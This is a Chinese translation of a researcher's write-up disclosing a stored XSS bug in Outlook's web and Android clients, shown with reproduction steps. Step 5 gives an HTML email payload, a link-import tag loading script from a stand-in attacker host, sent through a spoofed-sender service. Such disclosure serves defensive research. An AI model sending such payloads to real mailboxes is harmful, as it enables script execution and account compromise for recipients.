Outlook中的存储型XSS——网页版和安卓版均受影响

iso60001  15天前

22.jpg

大家好,这是我第一次写漏洞文章,也是我发现的第一个Outlook漏洞。

在很多网络消息服务中,例如Gmail、Outlook、Yahoo等,都允许接受并渲染电子邮件中的HTML内容(Content-Type: text/html),但同时也会进行安全限制,只允许AH1img等标签。

而当我测试Outlook中的安全过滤机制时,发现link标签并不会被过滤。这就让我有机可乘,成功引入了外部JS代码,实现了弹框。

复现步骤

  1. 进入网站https://emkei.cz/,这个网站的能直接设置发送的电子邮件的内容的类型。

  2. 随机往邮件主题、发件人和发件地址填入字符。

  3. 往收件人地址填入你需要测试的电子邮件地址。

  4. Content-Type设定为text/html

  5. 邮件正文填入<link rel=import href=https://Evilcom/filepayload>,点击提交。

  6. 登入收件电子邮箱,点击查看消息,payload就会成功执行!

以下为PoC视频地址:

https://youtu.be/khsLfQwy1ik

33.png

44.png

55.png

Android版漏洞

在第一个漏洞被修复后,我下载了对应的Android版本,尝试使用相同的方法进行攻击。结果发现手机端应用的缺陷更大,直接插入了payload,成功弹框。

66.png

77.png

88.png

感谢你的阅读!

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场
来源:https://medium.com/@elmrhassel/xss-stored-on-outlook-web-outlook-android-app-ad4bd46b8823

最新评论

昵称
邮箱
提交评论

友情链接:FOFA FOEYE BCSEC BAIMAOHUI 安全客 i春秋

nosec.org All Rights Reserved 京ICP备15042518号